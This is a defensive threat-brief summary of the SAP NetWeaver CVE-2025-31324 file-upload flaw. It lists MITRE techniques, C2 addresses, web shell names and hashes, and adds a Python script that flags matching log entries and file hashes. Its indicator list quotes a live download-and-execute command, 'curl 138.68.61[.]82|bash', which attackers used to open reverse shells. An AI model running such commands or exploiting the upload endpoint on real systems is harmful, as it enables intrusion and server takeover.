A critical SAP NetWeaver vulnerability (CVE-2025-31324) allows unauthenticated attackers to upload malicious files, enabling remote code execution and full system compromise via web shells and reverse shells. Immediate remediation and detection are essential. (Affected: SAP NetWeaver application servers, enterprise IT systems)
Key points:
- CVE-2025-31324 is a critical file upload vulnerability in SAP NetWeaver Visual Composer Framework (VCFRAMEWORK) version 7.50.
- The vulnerability enables unauthenticated attackers to upload arbitrary files through the /developmentserver/metadatauploader endpoint.
- Successful exploitation leads to remote code execution and full system compromise.
- Attackers deploy JSP web shells like helper.jsp, cache.jsp, ran.jsp for persistent access.
- Observed post-exploit activity includes reconnaissance commands and deployment of reverse shell tools such as GOREVERSE and reverse SSH SOCKS proxies.
- Malicious payloads and tools were downloaded from multiple suspicious IPs and domains, including ocr-freespace.oss-cn-beijing.aliyuncs[.]com.
- Palo Alto Networks products provide layered defenses via NGFW signatures, Cortex Xpanse discovery, Cortex XDR/XSIAM anti-webshell protections, and URL/DNS filtering.
- Indicators of Compromise include multiple suspicious IP addresses, domain names, and hashed payloads related to web shells and reverse shells.
- Exploitation activity increased notably after vulnerability disclosure in April 2025.
- Organizations are urged to apply patches, monitor exposures, and leverage incident response resources for mitigation.
MITRE Techniques:
- Exploitation for Client Execution (T1203) – Attackers exploit the file upload vulnerability on the /developmentserver/metadatauploader endpoint to execute code.
- Initial Access via Exploit Public-Facing Application (T1190) – Leverages vulnerable SAP NetWeaver public-facing application to gain unauthorized access.
- Web Shell (T1505.003) – Deployment and use of JSP web shells (e.g., helper.jsp, cache.jsp, ran.jsp) for persistent command execution.
- Command and Scripting Interpreter (T1059) – Execution of OS commands via web shells and PowerShell scripts on the compromised servers.
- Remote File Copy (T1105) – Download of malicious payloads and scripts from attacker-controlled infrastructure.
- Internal Reconnaissance (T1083) – Execution of system and network information gathering commands post-compromise.
- Proxy (T1090) – Use of reverse SSH SOCKS proxy to tunnel traffic and maintain remote access.
- Obfuscated Files or Information (T1027) – Use of obfuscated binaries and encoded PowerShell scripts for stealthy payload delivery.
- Scheduled Task/Job (T1053) – Potential use of scheduled tasks via crontab enumeration and modification for persistence.
Indicators of Compromise:
- The article includes IP addresses associated with Command and Control servers, such as 47.97.42[.]177 (GOREVERSE C2) and 45.76.93[.]60 (Reverse SSH proxy C2).
- Multiple domain names serve malicious payloads or scripts, e.g., ocr-freespace.oss-cn-beijing.aliyuncs[.]com and d-69b.pages[.]dev.
- Hashes of various malicious files and web shells are provided, including JSP web shells (e.g., helper.jsp SHA256: 598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0) and reverse shell binaries (e.g., GOREVERSE hash: 888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef).
- Commands used to download and execute malicious payloads via PowerShell or curl, e.g., ‘curl 138.68.61[.]82|bash’ establishing reverse shells.
- The presence of suspicious files named ansgdhs.bat and other artifacts indicating lateral movement or payload deployment.
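The following is an added detection example, not code from the Unit 42 brief or from Palo Alto Networks. It turns the indicators listed above (the /developmentserver/metadatauploader upload endpoint, the helper.jsp, cache.jsp and ran.jsp web shell names, and the two SHA256 values quoted in the brief) into a small triage script: one function scans HTTP access-log lines for uploads to the vulnerable endpoint and for requests to known web shell names, and another checks a file-hash inventory (for example an EDR export) against the quoted hashes. The log lines are constructed samples in Apache/NGINX combined format; real SAP ICM access logs use a different layout, so the regular expression is an assumption that would need adjusting for them.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (combined format); not real telemetry.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Apr/2025:10:01:12 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 512 "-" "curl/8.1"
10.0.0.5 - - [25/Apr/2025:10:01:40 +0000] "GET /irj/helper.jsp?cmd=id HTTP/1.1" 200 88 "-" "curl/8.1"
192.168.1.20 - - [25/Apr/2025:10:02:03 +0000] "GET /irj/portal HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Apr/2025:10:03:15 +0000] "GET /irj/cache.jsp HTTP/1.1" 404 0 "-" "python-requests/2.31"
"""

# Endpoint and web shell file names named in the brief.
UPLOAD_ENDPOINT = "/developmentserver/metadatauploader"
WEBSHELL_NAMES = {"helper.jsp", "cache.jsp", "ran.jsp"}

# SHA256 values quoted in the brief, mapped to the artifact they identify.
KNOWN_BAD_SHA256 = {
    "598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0": "helper.jsp web shell",
    "888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef": "GOREVERSE reverse shell",
}

# Assumed combined-format line: client, ident, user, [timestamp], "METHOD path proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(text: str) -> List[Dict[str, str]]:
    """Return one hit per log line that touches the upload endpoint or a known web shell name."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real deployment would count these separately
        path = m.group("path").split("?", 1)[0]   # drop query string before matching
        basename = path.rsplit("/", 1)[-1]
        if m.group("method") == "POST" and path == UPLOAD_ENDPOINT:
            reason = "POST to vulnerable metadatauploader endpoint"
        elif basename in WEBSHELL_NAMES:
            # Even a 404 is worth recording: it shows someone probing for a shell by name.
            reason = f"request for known web shell name {basename}"
        else:
            continue
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "path": path,
            "status": m.group("status"),
            "reason": reason,
        })
    return hits


def match_known_hashes(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map file path -> artifact label for every inventory entry whose SHA256 is in the brief."""
    return {
        path: KNOWN_BAD_SHA256[digest.lower()]
        for path, digest in inventory.items()
        if digest.lower() in KNOWN_BAD_SHA256
    }


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['status']} {hit['path']}: {hit['reason']}")
    # Constructed inventory: a hypothetical path paired with the helper.jsp hash from the brief.
    sample_inventory = {
        "/usr/sap/<SID>/.../irj/root/helper.jsp": "598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0",
        "/usr/sap/<SID>/.../irj/root/index.jsp": "0" * 64,
    }
    for path, label in match_known_hashes(sample_inventory).items():
        print(f"hash match: {path} -> {label}")
```

The access-log scan flags the upload POST and both web shell requests (including the 404 probe for cache.jsp) while ignoring the ordinary portal request; the hash check reports only the entry whose digest matches one quoted in the brief. Both functions return structured results rather than printing, so they can feed a SIEM rule or a ticketing workflow directly.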

Read more: https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/